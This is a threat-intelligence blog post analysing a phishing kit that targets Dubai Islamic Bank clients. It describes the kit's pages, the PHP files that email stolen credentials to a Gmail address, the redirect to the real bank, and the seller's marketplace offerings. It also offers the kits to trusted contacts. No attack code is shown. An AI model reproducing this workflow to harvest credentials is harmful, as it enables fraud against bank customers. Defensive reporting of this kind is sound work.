Dubai Islamic Bank phishing kit

Another phishing kit has emerged recently from the same actor “traderpcp” who seems to be very specialized into offering web shells, phishing kits, spam lists (also called leads), hacking tools, and cpanel access. The threat actor “traderpcp” is very active on a criminal marketplace where he sells his wares.

Screen Shot 2017-01-25 at 1.35.42 PM.png

We discovered a new phishing kit on a compromised server, aiming to collect credentials of Dubai Islamic Bank clients. The kit is composed of a few files:

screen-shot-2017-01-25-at-2-19-35-pm

The kit is very simple. The file index.html calls out the logo.png, filesfirstinfo.php, submit.png, and index.png to display the first web page of the phishing kit as follow:

screen-shot-2017-01-25-at-2-40-35-pm

The file firstinfo.php is responsible for  capturing and sending the data to the criminal:

screen-shot-2017-01-25-at-2-50-22-pm

The php script captures and send the stolen information to a Gmail address “pakpaki1989@gmail.com”, and calls out the file 2ndpage.html. The file 2ndpage.html is a second web page that asks additional information from the victims, such as phone number, email address and email password:

screen-shot-2017-01-25-at-2-40-48-pm

As for the first page, the file 2ndpage.html only calls out a bunch of other files, in this case, it calls out logo.png, 2ndpage.php, submit.png, and 2ndpage.png:

screen-shot-2017-01-25-at-2-56-49-pm

The file 2ndpage.php is very similar to the file firstinfo.php.

screen-shot-2017-01-25-at-3-17-05-pm

It captures the information and send them to the same Gmail address “pakpaki1989@gmail.com” and redirects the user to the real website at the URL “https://ebank.dibpak.com/ebank/” that seems to be aware of this type of fraudulent activity. Upon arriving on the site, a pop-up warning their clients is displayed:

screen-shot-2017-01-25-at-2-41-29-pm

The threat actor traderpcp appears to be very active on that criminal marketplace, offering his wares for a fair price, also demonstrating that they work. The threat actor offers phishing kits for three major US banks, such as USAA, Chase, and Bank of America. He also offers phishing kit for LinkedIn and Apple. Although phishing kits are not a new threat, the fact that the threat actor provides lists of emails to spam, access to a compromised server via a web shell, and the phishing kit makes it much easier for criminals to start a phishing campaign targeting these institutions.

PS: Phishing kits can be provided on a case by case basis to people we know and trust.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s